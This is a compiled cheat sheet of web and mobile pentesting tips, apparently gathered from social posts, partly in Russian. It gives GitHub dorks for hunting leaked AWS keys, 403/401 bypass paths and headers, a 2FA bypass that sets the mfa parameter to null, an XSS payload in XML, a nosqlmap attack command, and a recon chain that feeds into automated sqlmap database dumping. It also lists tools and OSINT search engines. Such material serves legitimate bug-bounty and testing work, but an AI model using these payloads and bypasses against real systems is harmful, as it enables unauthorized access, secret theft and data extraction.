GitHub dorks for AWS, Jira, Okta .. secrets

org:Target "bucket_name"
org:Target "aws_access_key"
org:Target "aws_secret_key"
org:Target "S3_BUCKET"
org:Target "S3_ACCESS_KEY_ID"
org:Target "S3_SECRET_ACCESS_KEY"
org:Target "S3_ENDPOINT"
org:Target "AWS_ACCESS_KEY_ID"
org:Target "list_aws_accounts"

Simple XSS

subfinder -d target.com | httprobe -c 100 > target.txt
cat target.txt | waybackurls | gf xss | kxss

List of 12 Android security testing tools

Dex2JAR - Set of tools to work with Android Dex and Java CLASS files
ByteCodeView - Java & Android APK reverse engineering suite (decompiler, editor, debugger & more)
JADX - Dex to Java decompiler tools for producing Java source code from Android Dex and APK files
JD-GUI - A standalone graphical utility that displays Java sources from CLASS files
Drozer - A comprehensive security testing framework for Android
Baksmali - An assembler/disassembler for the Dex format used by Dalvik (Android's Java)
AndroGuard - A swiss army knife for analyzing, decompilation and reversing of Android apps
ApkTool - Another swiss army knife tool for reverse engineering Android apps
QARK - Tool to look for several security related Android application vulnerabilities
AndroBugs - Another analysis tool for identifying security vulnerabilities in Android applications
AppMon - An automated framework for monitoring and tampering system API calls of native macOS, iOS and Android apps
MobSF - An all-in-one automated mobile security framework supporting Android, iOS and Windows mobile apps

Tips on bypassing 403 and 401 errors

1. Header:

X-Original-URL: /admin
X-Override-URL: /admin
X-Rewrite-URL: /admin

2. URL:

/accessible/..;/admin
/.;/admin
/admin;/
/admin/~
/./admin/./
/admin?param
/%2e/admin
/admin#

3. Method switching: Change the method from GET to POST, and see if you get something..
4. Via IP, Vhost: Access the site via its IP or Vhost to get the forbidden content.
5. Fuzzing: By bruteforcing (fuzzing) files or directories further..
6. Adding headers: X-Originating-IP, X-Remote-IP, X-Client-IP, X-Forwarded-For
7. Unicode chars

Multi-factor (2FA) authentication bypass

1. While 2FA is disabled:
Request:

{"email":"abc@gmail.com","password":"abc@123","mfa":null,"code":""}

Response:
Location: https://vulnerable-site.com/user/dashboard

2. While 2FA is enabled:

Request:

{"email":"abc@gmail.com","password":"abc@123","mfa":true,"code":""}

Response:
Location: https://vulnerable-site.com/v1/proxy/authentication/authenticate

3. Now tamper with the parameters and change to "mfa":null,"code":""

Top 20 search engines for hackers

censys.io – Censys Search Engine
shodan.io – Search engine for Internet-connected devices
viz.greynoise.io – GreyNoise Visualizer
zoomeye.org – Cyberspace Search Engine
onyphe.io – Cyber Defense Search Engine
wigle.net – Wireless Network Mapping
intelx.io – Intelligence X
fofa.so – Cyberspace Security Search Engine
hunter.io – OSINT Search Engine
zorexeye.com – Hacker’s Search Engine
pulsedive.com – Threat intelligence Search Engine
netograph.io – Mapping the deep structure of the web
vigilante.pw – Breached Database Directory
pipl.com – Search engine for real identity profiles
abuse.ch – Threat intelligence, malwares etc.
maltiverse.com – Open IoC Search Engine, Threat Intel
insecam.org – World biggest online cameras directory
spyse.com – Internet Assets Search Engine
dnsdumpster.com – DNS recon & research
phonebook.cz – Search for subdomains, email addresses, or URLs

XSS payload in an XML file

xss.xml:

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

​​⚙️ Расширение Burp Suite для раскрытия HTTP методов

Использование других HTTP методов может помочь в нахождении новых уязвимостей, а также при получении доступа к страницам, к которым доступ запрещён.

Расширение HTTP Methods Discloser выполняет запрос OPTIONS и определяет, доступны ли другие методы HTTP, кроме того, что в исходном запросе.

Если доступны другие методы, запрос будет выделен в разделе «Proxy/Http History», а доступные методы HTTP будут установлены в столбце «Comment».

#web #burp

Android Application Pentesting - Mystikcon 2020
https://www.youtube.com/watch?v=NrxTBcjAL8A&t=171

nosqlmap.py --attack 2 --victim TARGET --webPort 80 --uri /URL --httpMethod POST --postData email,test@test.test,password,qwerty --injectedParameter 1 --injectSize 4 --injectFormat 2 --savePath output.log

— attack 2 — Use the NoSQL Web App attacks
— victim TARGET — The target host is target.lan
— webPort 80 — The target webserver is listening on port 80
— uri /URL — The web path to attack
— httpMethod POST — Use POST requests
— postData email,test@test.test,password,qwerty — Use this CSV data for POST request
— injectedParameter 1 — Inject into the first parameter (as listed by NoSQLMap)
— injectSize 4 — The injected random string values should be 4 characters long
— injectFormat 2 — For injected strings, use the “letters only” format
— savePath output.log — Save all findings to a file called output.log

amass enum --passive -d $1 > amass; assetfinder --subs-only $1 > assetfinder; subfinder -d $1 > subfinder; cat amass assetfinder subfinder | sort -u > subs; cat subs | httpx > subs.alive; cat subs.alive | waybackurl > urls.check; cat subs.alive | gauplus | anew urls.check; cat subs.alive | hakrawler -depth 5 -plain | anew urls.check; cat gf sqli urls.check > urls.sqli; sqlmap -m urls.sqli --dbs --batch --random-agent

Update:
add recon: amass, assetfinder
remove gau
add gauplus & hakrawler

Ок. Пробежимся по полезному инструментарию для изучения сайтов и доменов, который был использован при подготовке статьи.

themarkup.org/blacklight - позволяет найти на сайте следящие рекламные модули
spyonweb.com - позволяет искать совпадения по рекламным идентификаторам
whois.domaintools.com - один из лучших WHOIS-сервисов
maxmind.com/en/geoip2-precision-demo - проверка IP-адресов
domainbigdata.com - позволяет искать архивные данные и контакты владельца домена
phonebook.cz - позволяет искать архивные данные и контакты владельца домена
spiderfoot.net - специализированный сервис для изучения интернет-ресурсов
archive.org/web/ - сохраняет копию веб-страницы в криминалистических целях

#КакOSINTить